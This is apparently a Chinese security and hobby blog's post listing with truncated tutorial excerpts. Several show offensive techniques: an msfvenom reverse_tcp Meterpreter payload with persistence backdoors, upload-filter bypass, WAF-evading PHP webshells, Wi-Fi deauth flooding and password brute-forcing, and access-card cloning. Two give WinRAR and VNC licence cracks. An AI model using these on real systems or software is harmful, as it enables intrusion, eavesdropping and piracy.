建站VPS工具综合杂谈

什么是智能摘要智能摘要可以帮助网站在搜索结果中展现更丰富，带来更多点击。您需要提供网站的结构化数据，在网站的页面中插入相应协议标签。 这里以博客的为例 <!--必填--> <meta property="og:type" content="blog"/> <meta property="og:image" content="图片地址"/> <meta property="og:release_date" content="发表时间"/> <!--选填--> <meta property="og:title" content=" 博客标题"/> <meta property="og:description" content=" 博客描述" /> <meta property="og:author" content="博客作者"/>在typecho中配置如下 <!--360--> <?php if($this->is('post')||$this->is('page')): ?> <meta property="og:type" content="blog"/> <meta property="og:image" content="<?php echo Content::returnHeaderImgSrc($this,'post',0,true); ?>"/> <met…

rar是一款强大的文件压缩工具，但是由于免费版存在弹窗广告极其恶心。如何去掉广告，用上绿色安全的压缩工具呢。实验环境winrar6.0ResourceHacker 首先到官网下载最新版的winrar,我这里以64位为例！ 下载后，安装顺序安装winrar。安装完成后，运行rar我们便可以看到恶心的广告了！ 破解度娘搜索下载ResourceHacker 找到winrar的安装路径，默认是C:\Program Files\WinRAR 把安装目录下的winrar.exe文件拖到ResourceHacker 在左侧目录里面找到String Table,打开后再找到80:2052 将1277行全部删掉 最后点击左上角File-Save As保存即可! 效果最后打开压缩文件，就没有恶心的广告啦！

如何利用Python处理学生的成绩表呢?在实际问题中，我们常用excel来完成此工作。如计算平均分、总分、及格人数等。如何利用Python来完成此工作呢? 前期准备Python3.9所需模块pandas openpyxl成绩表.xlsx win10安装pyton环境Python 安装包下载地址：https://www.python.org/downloads/ 打开该链接，点击下图中的版本号或者Download按钮进入对应版本的下载页面，滚动到最后即可看到各个平台的 Python 安装包。 对前缀的说明： 以Windows installer (64-bit)开头的是 64 位的 Python 安装程序； 以Windows installer (32-bit)开头的是 32 位的 Python 安装程序。 对后缀的说明： embeddable zip file表示.zip格式的绿色免安装版本，可以直接嵌入（集成）到其它的应用程序中； executable installer表示.exe格式的可执行程序，这是完整的离线安装包，一般选择这个即可； web-based installer表示通过网络安装的，也就是说下载到的是一个空壳，安装过程中还需要联网下载真正的 Python 安装包。 *注意勾选Add Python 3.9 to PATH，这样可以将 Python 命令工具所在目录添加到系统 Path 环境变量中，以后开发程序或者运行 Python 命令会非常方便。 继续点击下一步，这样便很快完成python的安装。 验证 在cmd中…

一、前言：Nmap是一个非常实用的网络连接端扫描软件，适用于Linux、Windows、Mac三大主流平台。用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端，并且推断计算机运行哪个操作系统（这是亦称 fingerprinting）。它是网络管理员必用的软件之一，以及用以评估网络系统安全。 二、主机发现：1.全面扫描/综合扫描 nmap -A 192.168.242.1 2.Ping扫描 nmap -sP 192.168.242.1/243.免ping扫描，穿透防火墙，避免被防火墙发现 nmap -P0 192.168.242.14.TCP SYN Ping扫描 nmap -PS -v 192.168.242.135nmap -PS80()端口，10-100 -v 192.168.242.135 (针对防火墙丢弃RST包) 5.TCP ACK Ping 扫描 nmap -PA -v 192.168.242.135UDP Ping 扫描 nmap -PU -v 192.168.242.135ICMP Ping Types 扫描 nmap -PU -v 192.168.242.135 (ICMP ECHO) nmap -PP -v 192.168.242.135 (ICMP 时间戳) nmap -PM -v 192.168.242.135 (ICMP 地址掩码)ARP Ping 扫描 nmap -PR -v 192.168.242.1列表扫描 nmap -sL -v 192.168.242.110.禁止方向域名解析 nmap…

登录数据库mysql -u root -p显示数据库show databases;选择数据库use dbname;显示数据库中的表show tables;新建数据库create database dbname;删除数据库dorp database dbname;显示表结构desc dbname;查询数据库selcet *from dbname;

介绍我有一台Ubuntu服务器，上面运行了若干应用。我希望某个应用崩溃或出问题的时候，系统后台自动把故障信息发到我的邮箱。这样，免去了我远程登录服务器，查看运行故障日志的烦恼。此处仅需要服务器能发送邮件即可，不需收取邮件。 Postfix是Linux平台上应用广泛的邮件系统。本文中将在Ubuntu平台上安装配置Postfix，实现发送邮件功能。 步骤一：安装Postfix首先更新软件包： sudo apt-get update然后安装Mailutils(Postfix在该包中): sudo apt-get install mailutils安装中首先会出现问题请你确认，选择Y Do you want to continue?[Y/n] 在确认配置页面，tab至ok，回车： 以下配置页面共5个选项，我们选择默认选项Internet Site： 下面的配置页面是输入系统邮件名字，保持默认： 步骤二：配置PostfixPostfix需要在配置中监听loopbackinterface，打开主Postfix配置文件： sudo vi /etc/postfix/main.cf将inet_interfaces = all更为inet_interfaces = loopback-only，保存退出。 重启Postfix： sudo service postfix restart步骤三：测试发送邮件echo "测试邮件正文" | mail -s "邮件标题" your_email_address 用你的邮箱地址代替your_email_addres…

ZIPzip可能是目前使用得最多的文档压缩格式。它最大的优点就是在不同的操作系统平台，比如Linux， Windows以及Mac OS，上使用。缺点就是支持的压缩率不是很高，而tar.gz和tar.gz2在压缩率方面做得非常好。 可以使用下列的命令压缩一个目录： zip -r archive_name.zip directory_to_compress下面是如果解压一个zip文档： unzip archive_name.zipTARTar是在Linux中使用得非常广泛的文档打包格式。它的好处就是它只消耗非常少的CPU以及时间去打包文件，他仅仅只是一个打包工具，并不负责压缩。 下面是如何打包一个目录： tar -cvf archive_name.tar directory_to_compress如何解包： tar -xvf archive_name.tar.gz上面这个解包命令将会将文档解开在当前目录下面。当然，你也可以用这个命令来捏住解包的路径： tar -xvf archive_name.tar -C /tmp/extract_here/TAR.GZ它在压缩时不会占用太多CPU的，而且可以得到一个非常理想的压缩率。 使用下面这种格式去压缩一个目录： tar -zcvf archive_name.tar.gz directory_to_compress解压缩： tar -zxvf archive_name.tar.gz上面这个解包命令将会将文档解开在当前目录下面。 当然，你也可以用这个命令来捏住解包的路径： tar -zxvf ar…

基于文件后缀名的绕过同理，我们先看源码 $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists($UPLOAD_ADDR)) { $deny_ext = array('.asp','.aspx','.php','.jsp'); $file_name = trim($_FILES['upload_file']['name']); $file_name = deldot($file_name);//删除文件名末尾的点 $file_ext = strrchr($file_name, '.'); $file_ext = strtolower($file_ext); //转换为小写 $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA $file_ext = trim($file_ext); //收尾去空 if(!in_array($file_ext, $deny_ext)) { if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR. '/' . $_FILES['upload_file']['name'])) { …

说明：Tracert（跟踪路由）是路由跟踪实用程序，用于确定 IP数据包访问目标所采取的路径。Tracert 命令使用用 IP 生存时间 (TTL) 字段和 ICMP 错误消息来确定从一个主机到网络上其他主机的路由。 通常情况我们追踪路由一般是通过系统自带的Tracert命令来完成，无需安装额外的软件，不过这里介绍一款更加简单方便的路由追踪工具17monipdb，此工具是由ipip.net提供，个人感觉测试数据在国内比较精准。 这个工具到底有什么用？简单来说假设您的网站存放在国外服务器，您可以通过此工具来追踪路由，从您本地网络到国外服务器所经过的任何一个路由节点，通常我们也可以使用此工具来测试您本地网络到机房网络是否绕路。 特色功能：显示每个节点的路由位置带有地图显示功能，路线清晰明了可自由切换DNS服务器 下载下载地址：17monipdb.zip

#写在前面： 过狗相关的资料网上也是有很多，所以在我接下来的文章中，可能观点或者举例可能会与网上部分雷同，或者表述不够全面。 但是我只能说，我所传达给大家的信息，是我目前所掌握或者了解的，不能保证所有人都会有收获，但是个人水平有限，可能您觉得文章水平过低，或者并无太大营养。但是跳出文章本身，无论何种技术，重在交流，分享与总结。 另外，希望年轻人不要有太多戾气，更多的是需要保持一个谦逊态度对待技术，尤其是这个浮躁的安全界。 以上是我的开场白（没办法，这是我的一贯风格） 写php后门连载的目的。希望大家能够暂缓日站的脚步，静下心来想一想，我们在用菜刀做一些除(sang)暴(jin)安(tian)良(liang)的事的时候，php做了些什么，安全狗又蜷缩在门后目睹了些什么。 其实我更愿意传授安全之道，而非渗透之术。 参考过网上很多种已有的php后门的写法，总之思路各种奇葩与新奇，但是衡量一个优秀的php后门并不是单单的看代码多少，过狗怎么样，而是一种基于实际场景的一种变通，所以，php后门这是一门艺术。 连接后门时发生了什么所以当我在菜刀中双击连接的时候到底发生了什么，安全狗又是如何发现后门并拦截的？ php后门原理很简单，当我们连接时，实际上我们会向php文件post数据，这个数据的内容为我们需要php去执行的代码，当php获取到数据并执行后，将返回一个response。 那么waf能够识别到什么层次？其实waf最多获取到tcp数据，也就是说，可以获取到我们所post的数据，与服务器所返回的数据，至于php执行命令的过程，用了什么对象，走了什…

登录在浏览器中输入ip地址192.168.4.1 视频演示 使用教程 扫描网络 伪造ssid点击ssids添加WiFi名称 开始攻击 效果如下： 洪水攻击设备正常断网 参考文档esp8266环境搭建 esp8266固件刷入

视频演示 环境准备python2.7Kali 2019.4无线网卡弱口令字典 安装模块pip install pywifi注：没有没有安装pip先安装pip 安装命令： apt-get install python-pip部分代码解读： 导入模块 from pywifi import * import time import sys def main(): #扫描时常 scantimes = 3 #单个密码测试延迟 testtimes = 15 output = sys.stdout #结果文件保存路径 files = "TestRes.txt" #字典列表 keys = open(sys.argv[1],"r").readlines() print "|KEYS %s"%(len(keys)) #实例化一个pywifi对象 wifi = PyWiFi() #选择定一个网卡并赋值于iface iface = wifi.interfaces()[0] #通过iface进行一个时常为scantimes的扫描并获取附近的热点基础配置 scanres = scans(iface,scantimes) #统计附近被发现的热点数量 nums = len(scanres) print "|SCAN GET %s"%(nums) print "%s\n%-*s| %-*s| %-*s| %-*s…

Python的学习过程中，往往会学习到很多库，而安装各类库的时候，往往不尽人意，下载速度从几KB到十几KB。甚至下载到一半还超时报错。这都是因为pip源是访问国外的官方源，如果需要把源改成国内源如：阿里源、网易源等，需要做如下设置。1）打开我的电脑。2）在我的电脑上的地址栏输入：%appdata%，然后回车。 3) 在这里面新建一个文件夹 pip4) 在pip文件夹里面新建一个文件叫做 pip.ini ,内容写如下即可。 [global] timeout = 6000 index-url = https://mirrors.aliyun.com/pypi/simple/ trusted-host = mirrors.aliyun.com测试下，舒服飞起来。 Linux下的配置cd ~ mkdir ~/.pip vi ~/.pip/pip.conf编辑内容，和windows一模一样即可。 hi 这是一个信封

持久化在msf生成的shell中，无论是是android还是windows在关闭软件或者设备重启后，我们的会话进程都会自然而然的关闭。要想得到会话，必须用户再次启动我们的shell才能得到会话。那么，我们该如何解决这一问题呢？ msf/Windows持久化1、metsvc：通过服务启动，是 Meterpreter 下的一个脚本； 运行 run metsvc 将会在目标主机上以 Meterpreter 的服务的形式注册在服务列表中，并开机自动自动； 运行 run metsvc -r 卸载目标主机上的 Meterpreter 服务； 原理：设置的后门在目标机启动后会自动开启一个服务，等待连接；这个有点正向代理的意思，自己开个端口等待接入控制； 优点：命令简单，不必设置太多参数，即不需要设置反弹到的主机IP、端口等，直接 run metsvc -A； 缺点：如何其他人知道服务器的ip，都可以利用这个后门开启的服务来控制服务器【扫描器发现】； 2、persistence：通过启动项启动，也是 Meterpreter 下的一个脚本； 移除后门：删除注册表中的值和上传的 VBScript 文件，具体位置执行脚本后有提示。 原理：有点反向代理的意思； 优点：由于是主动献殷勤，目标机器上的防火墙对于此等操作一般均会放行，后门的存活率较高； 环境介绍vps(msf端口)win10 (受害者) 生成shellmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.100 LPORT=4444…

首先做一次简单的分析，本次CTF共两关，第一关为图片隐藏，第二关为https的暴力破解。总奖金池金额为166元，摄影小狂人贝贝获得第一名，JUST RUN获得第二名。首先恭喜两位了！ 首先来看看战绩吧 当然，小伙伴们都顺利拿到了奖金。其余小伙伴瓜分的奖金！ 奖金公布 CTF writeup访问：http://106.13.39.165:66/ 开局一张图 本题考查的是图片隐写 解题方法参考摄影狂人小贝贝的方法（因为太懒，我没写 ） CTF解题思路

工欲其事必先利其器，在渗透测试中一份好的工具，是成功与否的关键所在。利用工具我们可以更加快捷的掌握系统中存在那些漏洞。从而完成一系列的渗透测试。 owaspOWASP是一个开源的、非盈利的全球性安全组织，致力于应用软件的安全研究。我们的使命是使应用软件更加安全，使企业和组织能够对应用安全风险做出更清晰的决策。目前OWASP全球拥有250个分部近7万名会员，共同推动了安全标准、安全测试工具、安全指导手册等应用安全技术的发展。 优点方便 简单 kali默认安装支持中文支持sql xxs 等常见的漏洞扫描结果支持导出 扫描速度快支持网站目录爬行niktoNikto是一款开源的（GPL）网页服务器扫描器，它可以对网页服务器进行全面的多种扫描，包含超过3300种有潜在危险的文件CGIs；超过625种服务器版本；超过230种特定服务器问题。 优点扫描速度快 支持网站目录爬行支持常见漏洞的扫描支持结果导出 WapitiWapiti 是另一个基于终端的 Web 漏洞扫描器，它发送 GET 和 POST 请求给目标站点，来寻找漏洞。 我们可以从终端窗口打开 Wapiti，例如： wapiti http://192.168.123.66/ -o wapiti_result -f html -m "-blindsql"我们会扫描 vulnerable_vm 中的 Peruggia 应用，将输出保存为 HTML 格式，保存到wapiti_result目录中，并跳过 SQL 盲注检测。 优点支持多种漏洞的扫描 效率更高支持模块化工具支持ssl攻击 ness…

利用adb命令，我们可以连接Android手机，在kali中如何配置安装呢？ 安装adb我们利用apt命令安装即可 apt-get install adb开启手机的usb试调 测试连接adb devices 显示手机中的所有应用adb shell pm list packages 查看手机电池情况adb shell dumpsys battery屏幕截图感觉这个功能很实用，很隐蔽。 adb exec-out screencap -p > bbskali.png 录制屏幕录制屏幕以 mp4 格式保存到 /sdcard： adb shell screenrecord /sdcard/filename.mp4需要停止时按 Ctrl-C，默认录制时间和最长录制时间都是 180 秒。 如果需要导出到电脑： adb pull /sdcard/filename.mp4

什么是 NFC近场通信技术（Near-field communication，NFC）由非接触式射频识别（RFID）演变而来，由飞利浦半导体（现恩智浦半导体）、诺基亚和索尼共同于2004年研制开发，其基础是RFID及互连技术。近场通信是一种短距高频的无线电技术，在13.56MHz频率运行于20厘米距离内。其传输速度有106 Kbit/秒、212 Kbit/秒或者424 Kbit/秒三种。当前近场通信已通过成为ISO/IEC IS 18092国际标准、EMCA-340标准与ETSI TS 102 190标准。NFC采用主动和被动两种读取模式。 NFC 卡片分类ID 卡（不能模拟）ID 卡全称身份识别卡(Identification Card)，为低频卡，工作频率为 125KHz-1000Khz（与大部分手机、智能设备工作频率不同，无法模拟），编号固定，卡号公开，不可写入数据，逐步淘汰中 IC 卡（可以模拟）全称集成电路卡(Integrated Circuit Card)，又称智能卡(Smart Card)，工作频率为 13.56MHz（与大部分手机NFC频率一样，可模拟），可读写，容量大，可加密，在身份认证、银行、电信、公共交通等领域得到越来越多的应用 如何区分 ID 卡和 IC 卡这边讲两个简单方法： 要是扣卡外观刻有数字00 开头的10、8、18 位数字，可判定此卡是 ID 卡带 NFC 功能的安卓手机，会对 IC 卡产生感应，由此可以用来分辨 IC 卡和 ID 卡设备清单PN532空白CUID卡加密的门禁卡Windows10PN532…

随着各大厂商的云盘不断的倒闭和关门大吉，我也常常在思考自己的云盘该何去何从。从百度吧，不开会员那就不叫云盘，都快到21世纪中叶了，下载个文件十几kb。贫穷让我无法感受会员的乐趣！ 设备单树莓派500G硬盘挂载硬盘首先利用fdisk -l命令查看硬盘 挂载硬盘到指定的目录 mount /dev/sda3 /home/pan这里我将硬盘挂到了/home/pan这个目录，方便我们以后的操作。 配置虚拟主机因为apache的默认目录在var/www/html并且该目录在我们的系统盘里面，所以我们要将云盘系统搭建我们的500g磁盘里面。所以我们要配置虚拟主机。 01：修改etc/apache2.ports.conf文件 添加下面内容： Listen 8080 0：修改etc/apache2/sites-available/000-default.conf文件 添加内容如下： <VirtualHost *:8080> ServerAdmin webmaster@localhost DocumentRoot /media/root/home/pan/ </VirtualHost>将DocumentRoot的参数改为我们磁盘的w位置。 03： 重启apache service apache2 start这样我们通过http://ip:8080便可以访问我们的磁盘。 搭建云盘系统这里我用了著名的nextcloud云盘系统。 登录数据库，创建一个数据库。 service mysql start mysql -u ro…

下载首先到vnc的官网去下载最新版的vnc server 安装运行安装程序，安装vnc 破解点击 licensing 去掉下面的匿名向vnc服务器发送数据前面的 √ 点击 register oggline 运行 crack完成破解 破解成功 配置vnc账号和密码 登录测试手机端登录 linux连接window桌面

什么是蜜罐蜜罐 技术本质上是一种对攻击方进行 欺骗的技术，通过布置一些作为 诱饵的主机、网络服务 或者 信息，诱使攻击方对它们实施攻击，从而可以对攻击行为进行 捕获 和 分析，了解攻击方所使用的工具与方法，推测攻击意图和动机，能够让防御方清晰地了解他们所面对的安全威胁，并通过技术和管理手段来增强实际系统的安全防护能力。 蜜罐 好比是 情报收集系统。蜜罐好像是故意让人攻击的目标，引诱黑客前来攻击。所以攻击者入侵后，你就可以知道他是如何得逞的，随时了解针对服务器发动的最新的攻击和漏洞。还可以通过窃听黑客之间的联系，收集黑客所用的种种工具，并且掌握他们的社交网络 系统介绍HFish 是一款基于 Golang 开发的跨平台多功能主动诱导型开源蜜罐框架系统，为了企业安全防护做出了精心的打造，全程记录黑客攻击手段，实现防护自主化。 多功能 不仅仅支持HTTP(S) 蜜罐，还支持SSH、SFTP、Redis、Mysql、FTP、Telnet、暗网 等扩展性 提供API 接口，使用者可以随意扩展蜜罐模块 (WEB、PC、APP )便捷性 使用Golang +SQLite 开发，使用者可以在Win +Mac +Linux 上快速部署一套蜜罐平台安装浏览器打开 https://github.com/hacklcx/HFish/releases下载相对应版本。 tar -zxvf fish-0.2-linux-amd64.tar.gz #名字是下载的压缩包，根据实际情况修改 cd hfish-0.2-linux-amd64 …

博客主要是以 佛系更新为主，百度收录惨淡就不提了。作为一名合格的博主，如何让百度爹地更好的收录呢？除了 sitemap 自动推送等方式外，还有那些方法呢？ 流程图 python代码import re from time import sleep import requests try: with open(r'sitemap.xml', 'r', encoding='UTF-8') as f: a = f.read() p = re.compile(r'https://(.+)</loc>') r = p.findall(a) data = '\n'.join(r) url = f'http://data.zz.baidu.com/urls?site=你的域名&token=你的token' #记得修改成自己的网址和token a = requests.post(url, data=data) print(a.text) sleep(3) except FileNotFoundError: print('请将sitemap.xml和本程序放在同一目录下') sleep(3)登录百度站长中心，获取你自己的 token 命名为 seo.py名字可以自定义。 shell脚本#!/bin/ #进入到seo优化文件 cd /root/seo #下载远程site…

我们生活中常见的都是一些比较常见的家庭的路由器。而我又喜欢动手DIY,可又苦于没有钱😂。想玩一些比较高级的东西只能望洋兴叹！！！ 准备树莓派4bOpenwrt镜像（文末附下载链接）TF卡 读卡器 写入系统利用Win32DiskImager将下载下来的openwrt镜像写入TF卡。 启动将TF卡插入树莓派。通电即可！ 登录用网线连接pc和树莓派，浏览器访问192.168.1.1看到登录页面，说明写入成功。 用户名：root 密码：password 其他的功能我就不再介绍，有需要的可以看看！ 镜像下载镜像下载

请注意，本文编写于 1416 天前，最后修改于 1400 天前，其中某些信息可能已经过时。 家里有台lenvo m7400 pro，由于没有网络打印功能。在之前是通过共享打印机的方式实现局域网内的设备完成打印的。但是手机等设备无法连接，当连接打印机的主机关闭后，其他电脑也无法打印。于是我用树莓派将打印机连接实现了网络打印功能。 设备清单lenovo M7400 pro树莓派4B魅族路由器（刷了老毛子固件 方案二） 登录树莓派 进行相关配置登录树莓派 安装cups CUPS(Common UNIX Printing System，通用Unix打印系统)是Fedora Core3中支持的打印系统，它主要是使用IPP(Internet Printing Protocol)来管理打印工作及队列，但同时也支持"LPD"(Line Printer Daemon)和"SMB"(Server Message Block)以及AppSocket等通信协议。apt-get install cups 如上，安装完成cups后执行下面操作 service cups start #启动服务 service cups stop #关闭服务 usermod -a -G lpadmin root #将lpadmin添加到用户组 cupsctl --remote-any这时候，在局域网内任何一台电脑或手机的浏览器中，访问树莓派的 631 端口，如：http://192.168.123.XX:631，就可以进入基于网页的 CUPS 配置界面。 依次点击「Ad­min­…

前言在学籍管理中，我们导出学籍后（姓名 学籍号 身份证号）等常用的信息。如何按照学籍信息和对应学生的照片进行命名呢？首先来看看效果 如上，假设我们根据学籍信息（由A-Z排序），拍摄学生照片。如何将excel中对应的学生姓名和学号与对应的学生匹配并重命名呢? 最终实现的效果 问题解决难点将excel中数据和图片一一对应是关键。故要求我们在拍摄照片时需按照学生姓名（由A-Z排序）进行拍摄。不然数据可能无法一一对应。 实现方案01对拍摄的所有文件批量重命名因为照相设备的不同，拷贝出来相片的命名方式是不同的。 如上，按照学生姓名（由A-Z排序）后，给学生拍照。 将所有图片进行批量重命名 import os class BatchRename(): def __init__(self): self.path = '/root/photo/photo1/' def rename(self): filelist = os.listdir(self.path) filelist.sort() total_num = len(filelist) i = 0 for item in filelist: if item.endswith('.jpg'): src = os.path.join(os.path.abspath(self.path), item) …